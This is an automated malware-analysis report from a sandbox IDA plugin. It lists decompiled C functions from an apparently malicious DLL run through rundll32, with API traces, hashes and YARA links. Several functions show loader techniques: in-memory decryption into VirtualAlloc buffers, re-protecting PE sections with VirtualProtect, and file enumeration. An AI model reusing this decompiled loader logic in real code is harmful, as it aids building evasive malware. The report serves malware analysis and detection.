Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: FreeHeap
String ID: Uxt
API String ID: 3298025750-1536154274
Opcode ID: 6a25ef8b955a2107fe4479c89b187b881886a76cedb27f375637f9416badf18f
Instruction ID: 65777d1272002dbf0fe980d7531ebb09381eb83f72c3c0e46ee6707c4db63f00
Opcode Fuzzy Hash: 6a25ef8b955a2107fe4479c89b187b881886a76cedb27f375637f9416badf18f
Instruction Fuzzy Hash: FA31AD32900118BFEB11DB94DE85EEA7BBCFB48704F1400A5FA01AB021D3709E85DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A17790, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00A17790(intOrPtr* __eax, void* __ecx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				void* _v8;
				char _v48;
				void* __edi;
				intOrPtr _t23;
				long _t30;
				intOrPtr _t34;
				intOrPtr* _t42;
				void* _t43;
				void* _t47;
				intOrPtr* _t48;
				void* _t49;
				intOrPtr _t51;
				void* _t52;

				_t43 = __ecx;
				_t42 = _a16;
				_t48 = __eax;
				_t23 =  *0xa1d230; // 0x4a6a5a8
				_t2 = _t23 + 0xa1e671; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t42);
				if( *0xa1d204 >= 5) {
					_push( &_a16);
					_push( &_v8);
					_push( &_v48);
					_t30 = _a4;
					"QQSUVWh"();
					L5:
					_a4 = _t30;
					L6:
					if(_a4 != 0) {
						L9:
						 *0xa1d204 =  *0xa1d204 + 1;
						L10:
						return _a4;
					}
					_t50 = _a16;
					 *_t48 = _a16;
					_t49 = _v8;
					 *_t42 = E00A1A93C(_t50, _t49);
					_t34 = E00A193F5(_t47, _t49, _t50);
					if(_t34 != 0) {
						 *_a8 = _t49;
						 *_a12 = _t34;
						if( *0xa1d204 < 5) {
							 *0xa1d204 =  *0xa1d204 & 0x00000000;
						}
						goto L10;
					}
					_a4 = 0xbf;
					E00A154F9();
					HeapFree( *0xa1d1f0, 0, _t49);
					goto L9;
				}
				_t51 =  *0xa1d230; // 0x4a6a5a8
				_t4 = _t51 + 0xa1e7c4; // 0x6976612e
				_t52 = _t4;
				if(RtlAllocateHeap( *0xa1d1f0, 0, 0x800) == 0) {
					_a4 = 8;
					goto L6;
				}
				_t30 = E00A190BA(_a4, _t43, _t47, _t52,  &_v48,  &_v8,  &_a16, _t37); // executed
				goto L5;
			}

0x00a17790
0x00a17797
0x00a1779e
0x00a177a2
0x00a177a7
0x00a177b2
0x00a177c2
0x00a1780b
0x00a1780f
0x00a17813
0x00a17814
0x00a17817
0x00a1781c
0x00a1781c
0x00a1781f
0x00a17823
0x00a1785d
0x00a1785d
0x00a17863
0x00a1786a
0x00a1786a
0x00a17825
0x00a17828
0x00a1782a
0x00a17837
0x00a17839
0x00a17840
0x00a17877
0x00a1787c
0x00a1787e
0x00a17880
0x00a17880
0x00000000
0x00a1787e
0x00a17842
0x00a17849
0x00a17857
0x00000000
0x00a17857
0x00a177c4
0x00a177d7
0x00a177d7
0x00a177e5
0x00a177ff
0x00000000
0x00a177ff
0x00a177f8
0x00000000

APIs

wsprintfA.USER32 ref: 00A177B2
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00A177DD

Part of subcall function 00A190BA: GetTickCount.KERNEL32 ref: 00A190D1
Part of subcall function 00A190BA: wsprintfA.USER32 ref: 00A1911E
Part of subcall function 00A190BA: wsprintfA.USER32 ref: 00A1913B
Part of subcall function 00A190BA: wsprintfA.USER32 ref: 00A1915B
Part of subcall function 00A190BA: wsprintfA.USER32 ref: 00A19179
Part of subcall function 00A190BA: wsprintfA.USER32 ref: 00A1919C
Part of subcall function 00A190BA: wsprintfA.USER32 ref: 00A191BD

HeapFree.KERNEL32(00000000,00A19CFB,?,?,00A19CFB,?), ref: 00A17857

Strings

Uxt, xrefs: 00A17857

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: wsprintf$Heap$AllocateCountFreeTick
String ID: Uxt
API String ID: 2794511967-1536154274
Opcode ID: d61eed57edd3ddbd1c0065d491125f8b3c0721fd7584937bc05f0aa5a85e04bf
Instruction ID: f76105292575a52f092a85691beb1cae2cad475137aea64d12140717a517010b
Opcode Fuzzy Hash: d61eed57edd3ddbd1c0065d491125f8b3c0721fd7584937bc05f0aa5a85e04bf
Instruction Fuzzy Hash: 29312A76500119EFCB01DFA5DD88EDE7BB9FB08354F108016F915AB251D730E996CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A13F83, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57
memoryCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E00A13F83(void* __ecx, signed char* _a4) {
				signed int _v8;
				void* _v12;
				void* _t13;
				signed short _t16;
				signed int _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t22;
				void* _t23;
				signed short* _t26;
				void* _t27;
				intOrPtr* _t28;
				void* _t30;
				intOrPtr* _t31;

				_t31 = __imp__;
				_t23 = 0;
				_v8 = 1;
				_t28 = 0xa1d2e0;
				 *_t31(0, _t27, _t30, _t22, __ecx, __ecx);
				while(1) {
					_t13 = E00A17DD8(_a4,  &_v12); // executed
					if(_t13 == 0) {
						break;
					}
					_push(_v12);
					_t19 = 0xd;
					_t20 = E00A18DEA(_t19);
					if(_t20 == 0) {
						HeapFree( *0xa1d1f0, 0, _v12);
						break;
					} else {
						 *_t28 = _t20;
						_t28 = _t28 + 4;
						_t23 = _t23 + 1;
						if(_t23 < 3) {
							continue;
						} else {
						}
					}
					L7:
					 *_t31(1);
					if(_v8 != 0) {
						_t26 =  *0xa1d2e8; // 0x5489be8
						_t16 =  *_t26 & 0x0000ffff;
						if(_t16 < 0x61 || _t16 > 0x7a) {
							_t17 = _t16 & 0x0000ffff;
						} else {
							_t17 = (_t16 & 0x0000ffff) - 0x20;
						}
						 *_t26 = _t17;
					}
					return _v8;
				}
				_v8 = _v8 & 0x00000000;
				goto L7;
			}

0x00a13f8a
0x00a13f91
0x00a13f94
0x00a13f9b
0x00a13fa0
0x00a13fa2
0x00a13fa9
0x00a13fb0
0x00000000
0x00000000
0x00a13fb2
0x00a13fb7
0x00a13fb8
0x00a13fbf
0x00a13fd9
0x00000000
0x00a13fc1
0x00a13fc1
0x00a13fc3
0x00a13fc6
0x00a13fca
0x00000000
0x00000000
0x00a13fcc
0x00a13fca
0x00a13fe3
0x00a13fe5
0x00a13feb
0x00a13fed
0x00a13ff3
0x00a13ffa
0x00a1400a
0x00a14002
0x00a14005
0x00a14005
0x00a1400d
0x00a1400d
0x00a14017
0x00a14017
0x00a13fdf
0x00000000

APIs

Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00A13FA0

Part of subcall function 00A17DD8: RtlAllocateHeap.NTDLL(00000000,63699BC3,00A1D2E0), ref: 00A17E03
Part of subcall function 00A17DD8: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 00A17E25
Part of subcall function 00A17DD8: memset.NTDLL ref: 00A17E3F
Part of subcall function 00A17DD8: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00A17E7D
Part of subcall function 00A17DD8: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00A17E91
Part of subcall function 00A17DD8: CloseHandle.KERNEL32(?), ref: 00A17EA8
Part of subcall function 00A17DD8: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00A17EB4
Part of subcall function 00A17DD8: lstrcat.KERNEL32(?,642E2A5C), ref: 00A17EF5
Part of subcall function 00A17DD8: FindFirstFileA.KERNELBASE(?,?), ref: 00A17F0B

Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00A13FE5

Part of subcall function 00A18DEA: lstrlen.KERNEL32(?,00A1D2E0,747C7FC0,00000000,00A13FBD,?,?,?,?,?,00A19865,?), ref: 00A18DF3
Part of subcall function 00A18DEA: mbstowcs.NTDLL ref: 00A18E1A
Part of subcall function 00A18DEA: memset.NTDLL ref: 00A18E2C

HeapFree.KERNEL32(00000000,?,?,?,?,?,?,00A19865,?), ref: 00A13FD9

Strings

Uxt, xrefs: 00A13FD9

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: Wow64$FileHeap$AllocateEnableRedirectionmemset$CloseCreateFindFirstFreeHandleTimelstrcatlstrlenmbstowcs
String ID: Uxt
API String ID: 94831996-1536154274
Opcode ID: 4190d895f5305563b553b0db999e94020d0c27cdaf21e16633c2dad13cdc1ad0
Instruction ID: 85e62dcac181459d9b722c170e72677d47c34b32540cf0695cae554168b38f79
Opcode Fuzzy Hash: 4190d895f5305563b553b0db999e94020d0c27cdaf21e16633c2dad13cdc1ad0
Instruction Fuzzy Hash: 9F11C876600215EADB00DFDADC44BED77B8EF18355F104066E545D7190C2799EC2DB64

Uniqueness

Uniqueness Score: -1.00%

Function 6FC5CB20, Relevance: 6.2, APIs: 2, Strings: 1, Instructions: 957COMMONLIBRARYCODE

Download Yara Rule

Strings

,, xrefs: 6FC5D172

Memory Dump Source

Source File: 00000002.00000002.647449462.000000006FC50000.00000020.00020000.sdmp, Offset: 6FC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fc50000_rundll32.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: 576c7d5d229b0bcdb68390342b7074d82b107ee28c4f3aaa3eb52309dcbc28f1
Instruction ID: 2d8af0480b79805475153fdf4534380225c16ab11710ad72e69618fec9845309
Opcode Fuzzy Hash: 576c7d5d229b0bcdb68390342b7074d82b107ee28c4f3aaa3eb52309dcbc28f1
Instruction Fuzzy Hash: 6F82AD76908B528BCB01CF3DC8901A57FB1FB47334B444A2AE6668B341F3B49575CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00A19A14, Relevance: 6.2, APIs: 4, Instructions: 152memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 00A19A55
SysFreeString.OLEAUT32(00000000), ref: 00A19B38

Part of subcall function 00A1736F: SysAllocString.OLEAUT32(00A1C2C8), ref: 00A173BF

SafeArrayDestroy.OLEAUT32(?), ref: 00A19B8C
SysFreeString.OLEAUT32(?), ref: 00A19B9A

Part of subcall function 00A198B3: Sleep.KERNELBASE(000001F4), ref: 00A198FB

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: String$AllocFree$ArrayDestroySafeSleep
String ID:
API String ID: 3193056040-0
Opcode ID: 4b8f062d73899cdf313ff9602c335e011d1e2ad3d2a07ddcc9855ba52afedbf6
Instruction ID: 7700b822359dfd74fcef161ffc7dfc4e902f4ec5bc8acb021227c9db6f0dafa5
Opcode Fuzzy Hash: 4b8f062d73899cdf313ff9602c335e011d1e2ad3d2a07ddcc9855ba52afedbf6
Instruction Fuzzy Hash: E0516472904209EFDB00DFE4D9948EEB7B6FF88350B148929E505EB220D771AD86CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A18291, Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 00A182E8
SysAllocString.OLEAUT32(00A18812), ref: 00A1832B
SysFreeString.OLEAUT32(00000000), ref: 00A1833F
SysFreeString.OLEAUT32(00000000), ref: 00A1834D

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: f984d85faf1909091b032ce7daa7934c30262f238d3145bd08382bf98198073c
Instruction ID: 61bc0089c571699eeeab7b75519223e53839daa8462179e4ce0fdf6a9f9c4d84
Opcode Fuzzy Hash: f984d85faf1909091b032ce7daa7934c30262f238d3145bd08382bf98198073c
Instruction Fuzzy Hash: BD312C72900109EFCB05DF98D9848EE7BB5FF48340B14842EF9169B210EB389A86CF65

Uniqueness

Uniqueness Score: -1.00%

Function 6FC418B4, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6FC418B4(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				unsigned int _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v44;
				signed int _v48;
				intOrPtr _t39;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				signed int _t59;
				signed int _t61;
				intOrPtr _t66;
				intOrPtr _t77;
				void* _t78;
				signed int _t80;

				_t77 =  *0x6fc44130;
				_t39 = E6FC41568(_t77,  &_v20,  &_v12);
				_v16 = _t39;
				if(_t39 == 0) {
					asm("sbb ebx, ebx");
					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
					_t78 = _t77 + _v20;
					_v36 = _t78;
					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
					_v24 = _t46;
					if(_t46 == 0) {
						_v16 = 8;
					} else {
						_t61 = 0;
						if(_t59 <= 0) {
							_t47 =  *0x6fc4414c;
						} else {
							_t66 = _a4;
							_t50 = _t46 - _t78;
							_t11 = _t66 + 0x6fc45132; // 0x6fc45132
							_v28 = _t50;
							_v32 = _t50 + _t11;
							_v8 = _t78;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t19 = _t61 + 1; // 0x2
								_t80 = _t19;
								E6FC415C2(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
								_t64 = _v32;
								_v8 = _v8 + 0x1000;
								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
								_t61 = _t80;
								 *0x6fc4414c = _t47;
								if(_t61 >= _t59) {
									break;
								}
								_t50 = _v28;
							}
						}
						if(_t47 != 0x63699bc3) {
							_v16 = 0xc;
						} else {
							memcpy(_v36, _v24, _v12);
						}
						VirtualFree(_v24, 0, 0x8000); // executed
					}
				}
				return _v16;
			}

0x6fc418bb
0x6fc418cb
0x6fc418d2
0x6fc418d5
0x6fc418ea
0x6fc418f1
0x6fc418f6
0x6fc41907
0x6fc4190a
0x6fc41912
0x6fc41915
0x6fc419bf
0x6fc4191b
0x6fc4191b
0x6fc4191f
0x6fc41987
0x6fc41921
0x6fc41921
0x6fc41924
0x6fc41926
0x6fc4192e
0x6fc41931
0x6fc41934
0x6fc4193c
0x6fc41944
0x6fc41945
0x6fc41946
0x6fc4194d
0x6fc4194d
0x6fc41961
0x6fc41966
0x6fc4196f
0x6fc41976
0x6fc41979
0x6fc4197d
0x6fc41982
0x00000000
0x00000000
0x6fc41939
0x6fc41939
0x6fc41984
0x6fc41991
0x6fc419a6
0x6fc41993
0x6fc4199c
0x6fc419a1
0x6fc419b7
0x6fc419b7
0x6fc419c6
0x6fc419cc

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,00000000,?,00000000,?,?,?,?,?,?,6FC41045,00000000), ref: 6FC4190A
memcpy.NTDLL(?,6FC41045,?,?,00000000,?,00000000,?,?,?,?,?,?,6FC41045,00000000), ref: 6FC4199C
VirtualFree.KERNELBASE(6FC41045,00000000,00008000,?,00000000,?,00000000,?,?,?,?,?,?,6FC41045,00000000), ref: 6FC419B7

Strings

Dec 21 2020, xrefs: 6FC4193C

Memory Dump Source

Source File: 00000002.00000002.647343903.000000006FC41000.00000020.00020000.sdmp, Offset: 6FC40000, based on PE: true

Associated: 00000002.00000002.647310051.000000006FC40000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.647360060.000000006FC43000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.647382483.000000006FC45000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.647405824.000000006FC46000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fc40000_rundll32.jbxd

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Dec 21 2020
API String ID: 4010158826-582694290
Opcode ID: ab371ca8e949bfaaded13086a09b3ce67e83feac57ea977c57f1cbe252ce8d13
Instruction ID: 490f44598de23bf598f83ede8b73593cbcd40e1e020e2bb0d37296398b34cfd9
Opcode Fuzzy Hash: ab371ca8e949bfaaded13086a09b3ce67e83feac57ea977c57f1cbe252ce8d13
Instruction Fuzzy Hash: 47315271E006199BDF01DF9DC881ADEB7B5BF49308F108129D944E7244E771AA15CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6FC4116E, Relevance: 6.1, APIs: 4, Instructions: 61
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E6FC4116E() {
				char _v28;
				void _v44;
				char _v48;
				void* _v52;
				long _t24;
				int _t25;
				void* _t29;
				intOrPtr* _t31;
				signed int _t34;
				void* _t36;
				intOrPtr _t37;
				int _t41;

				 *0x6fc44148 =  *0x6fc44148 & 0x00000000;
				_push(0);
				_push(0x6fc44144);
				_push(1);
				_push( *0x6fc44150 + 0x6fc45084);
				 *0x6fc44140 = 0xc; // executed
				L6FC4178C(); // executed
				_t34 = 6;
				memset( &_v44, 0, _t34 << 2);
				if(E6FC41F65( &_v44,  &_v28,  *0x6fc4414c ^ 0xfd7cd1cf) == 0) {
					_t24 = 0xb;
					L7:
					ExitThread(_t24);
				}
				_t25 = lstrlenW( *0x6fc44138);
				_t7 = _t25 + 2; // 0x2
				_t41 = _t25 + _t7;
				_t10 = _t41 + 8; // 0xa
				_t29 = E6FC41DBD(_t37, _t10,  &_v48,  &_v52); // executed
				if(_t29 == 0) {
					_t36 =  *0x6fc44138;
					_t31 = _v52;
					 *_t31 = 0;
					if(_t36 == 0) {
						 *(_t31 + 4) =  *(_t31 + 4) & 0x00000000;
					} else {
						memcpy(_t31 + 4, _t36, _t41);
					}
				}
				_t24 = E6FC41252(_v44, _t37); // executed
				goto L7;
			}

0x6fc41179
0x6fc41184
0x6fc41186
0x6fc4118b
0x6fc41193
0x6fc41194
0x6fc4119e
0x6fc411a7
0x6fc411ac
0x6fc411ca
0x6fc41229
0x6fc4122a
0x6fc4122b
0x6fc4122b
0x6fc411d2
0x6fc411d8
0x6fc411d8
0x6fc411e6
0x6fc411ea
0x6fc411f1
0x6fc411f3
0x6fc411fb
0x6fc411ff
0x6fc41205
0x6fc41217
0x6fc41207
0x6fc4120d
0x6fc41212
0x6fc41205
0x6fc41220
0x00000000

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,6FC44144,00000000), ref: 6FC4119E
lstrlenW.KERNEL32(?,?,?), ref: 6FC411D2

Part of subcall function 6FC41DBD: GetSystemTimeAsFileTime.KERNEL32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,6FC411EF,0000000A,?), ref: 6FC41DCA
Part of subcall function 6FC41DBD: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6FC41DE0
Part of subcall function 6FC41DBD: _snwprintf.NTDLL ref: 6FC41E05
Part of subcall function 6FC41DBD: CreateFileMappingW.KERNELBASE(000000FF,6FC44140,00000004,00000000,?,?), ref: 6FC41E2A
Part of subcall function 6FC41DBD: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6FC411EF,0000000A), ref: 6FC41E41
Part of subcall function 6FC41DBD: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6FC411EF), ref: 6FC41E76

memcpy.NTDLL(?,?,00000002,0000000A,?,?), ref: 6FC4120D
ExitThread.KERNEL32 ref: 6FC4122B

Memory Dump Source

Source File: 00000002.00000002.647343903.000000006FC41000.00000020.00020000.sdmp, Offset: 6FC40000, based on PE: true

Associated: 00000002.00000002.647310051.000000006FC40000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.647360060.000000006FC43000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.647382483.000000006FC45000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.647405824.000000006FC46000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fc40000_rundll32.jbxd

Similarity

API ID: DescriptorFileSecurityTime$CloseConvertCreateErrorExitHandleLastMappingStringSystemThread_aulldiv_snwprintflstrlenmemcpy
String ID:
API String ID: 2378523637-0
Opcode ID: 83fb97b2d96c26082e07cddaba53ef47670d51b63f9d7b2c08afb26021bc11e6
Instruction ID: 64e08bacbaf6bde2885ebec6939347a7cd7f5c59b8f3edd9e5036850a71103fc
Opcode Fuzzy Hash: 83fb97b2d96c26082e07cddaba53ef47670d51b63f9d7b2c08afb26021bc11e6
Instruction Fuzzy Hash: D9115E72104702ABEB12DF68C845F8777FCBB59328F110A15FA95D7190E730E56C8B51

Uniqueness

Uniqueness Score: -1.00%

Function 00A163EE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49
memorytimeCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00A163EE(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				void* _t15;
				void* _t21;
				void* _t23;
				signed short* _t24;

				_t23 = E00A18DEA(0, _a12);
				if(_t23 == 0) {
					_t21 = 8;
				} else {
					_t24 = _t23 + _a16 * 2;
					 *_t24 =  *_t24 & 0x00000000; // executed
					_t15 = E00A19913(__ecx, _a4, _a8, _t23); // executed
					_t21 = _t15;
					if(_t21 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						_push( &_v12);
						 *_t24 = 0x5f;
						_t21 = E00A179EF(8, _a4, 0x80000001, _a8, _t23);
					}
					HeapFree( *0xa1d1f0, 0, _t23);
				}
				return _t21;
			}

0x00a16401
0x00a16405
0x00a1645f
0x00a16407
0x00a1640e
0x00a16414
0x00a16418
0x00a1641d
0x00a16421
0x00a16427
0x00a16430
0x00a16435
0x00a1644a
0x00a1644a
0x00a16455
0x00a16455
0x00a16466

APIs

Part of subcall function 00A18DEA: lstrlen.KERNEL32(?,00A1D2E0,747C7FC0,00000000,00A13FBD,?,?,?,?,?,00A19865,?), ref: 00A18DF3
Part of subcall function 00A18DEA: mbstowcs.NTDLL ref: 00A18E1A
Part of subcall function 00A18DEA: memset.NTDLL ref: 00A18E2C

GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,74785520,00000000,00000008,00000014,004F0053,0548931C), ref: 00A16427
HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,74785520,00000000,00000008,00000014,004F0053,0548931C), ref: 00A16455

Strings

Uxt, xrefs: 00A16455

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
String ID: Uxt
API String ID: 1500278894-1536154274
Opcode ID: 175fb4d0507407e0d7739b1820ee8e5355049393dae6230c5e197e13b3520484
Instruction ID: f36ce9432e17e6b14ecf1895b8352e6c9223f352117b755ee9da5faf5749e38d
Opcode Fuzzy Hash: 175fb4d0507407e0d7739b1820ee8e5355049393dae6230c5e197e13b3520484
Instruction Fuzzy Hash: 25018F3220020AFBDB216FA4DD45FDA7BB9FF84714F104425FA409A151EBB1D995C750

Uniqueness

Uniqueness Score: -1.00%

Function 6FC41CCA, Relevance: 4.6, APIs: 3, Instructions: 69
memoryCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E6FC41CCA(void* __eax, long __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				long _v16;
				signed int _v20;
				int _t33;
				signed int _t36;
				long _t41;
				void* _t50;
				void* _t51;
				signed int _t54;

				_t41 = __edx;
				_v12 = _v12 & 0x00000000;
				_t36 =  *(__eax + 6) & 0x0000ffff;
				_t50 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v20 = _t36;
				VirtualProtect(_a4,  *(__eax + 0x54), 4,  &_v16); // executed
				_v8 = _v8 & 0x00000000;
				if(_t36 <= 0) {
					L11:
					return _v12;
				}
				_t51 = _t50 + 0x24;
				while(1) {
					_t54 = _v12;
					if(_t54 != 0) {
						goto L11;
					}
					asm("bt dword [esi], 0x1d");
					if(_t54 >= 0) {
						asm("bt dword [esi], 0x1e");
						if(__eflags >= 0) {
							_t41 = 4;
						} else {
							asm("bt dword [esi], 0x1f");
							asm("sbb edx, edx");
							_t41 = ( ~(_t41 & 0xffffff00 | __eflags > 0x00000000) & 0x00000002) + 2;
						}
					} else {
						asm("bt dword [esi], 0x1f");
						asm("sbb edx, edx");
						_t41 = ( ~(_t41 & 0xffffff00 | _t54 > 0x00000000) & 0x00000020) + 0x20;
					}
					_t33 = VirtualProtect( *((intOrPtr*)(_t51 - 0x18)) + _a4,  *(_t51 - 0x1c), _t41,  &_v16); // executed
					if(_t33 == 0) {
						_v12 = GetLastError();
					}
					_t51 = _t51 + 0x28;
					_v8 = _v8 + 1;
					if(_v8 < _v20) {
						continue;
					} else {
						goto L11;
					}
				}
				goto L11;
			}

0x6fc41cca
0x6fc41cd4
0x6fc41cd9
0x6fc41ce5
0x6fc41cf2
0x6fc41cf8
0x6fc41cfa
0x6fc41d00
0x6fc41d6c
0x6fc41d73
0x6fc41d73
0x6fc41d02
0x6fc41d05
0x6fc41d05
0x6fc41d09
0x00000000
0x00000000
0x6fc41d0b
0x6fc41d0f
0x6fc41d24
0x6fc41d28
0x6fc41d3e
0x6fc41d2a
0x6fc41d2a
0x6fc41d33
0x6fc41d39
0x6fc41d39
0x6fc41d11
0x6fc41d11
0x6fc41d1a
0x6fc41d1f
0x6fc41d1f
0x6fc41d4f
0x6fc41d53
0x6fc41d5b
0x6fc41d5b
0x6fc41d5e
0x6fc41d61
0x6fc41d6a
0x00000000
0x00000000
0x00000000
0x00000000
0x6fc41d6a
0x00000000

APIs

VirtualProtect.KERNELBASE(00000000,?,00000004,00000002,?,00000002,00000000,?,00000002), ref: 6FC41CF8
VirtualProtect.KERNELBASE(00000000,00000000,00000004,?), ref: 6FC41D4F
GetLastError.KERNEL32(?,?), ref: 6FC41D55

Memory Dump Source

Source File: 00000002.00000002.647343903.000000006FC41000.00000020.00020000.sdmp, Offset: 6FC40000, based on PE: true

Associated: 00000002.00000002.647310051.000000006FC40000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.647360060.000000006FC43000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.647382483.000000006FC45000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.647405824.000000006FC46000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fc40000_rundll32.jbxd

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: 6bc4bef459cb2d4b0ad0d133d0ba97ae215671d95d403b351eaa3a7db28bce98
Instruction ID: 16caa2d407584b9fb851fe782cecaef92c79158dea9760a2c2f15accffd438a8
Opcode Fuzzy Hash: 6bc4bef459cb2d4b0ad0d133d0ba97ae215671d95d403b351eaa3a7db28bce98
Instruction Fuzzy Hash: AF21B4B690010DEFDB268F9DC881EAEF7F5FF84315F148559E68057101E3749A99CB50

Uniqueness

Uniqueness Score: -1.00%

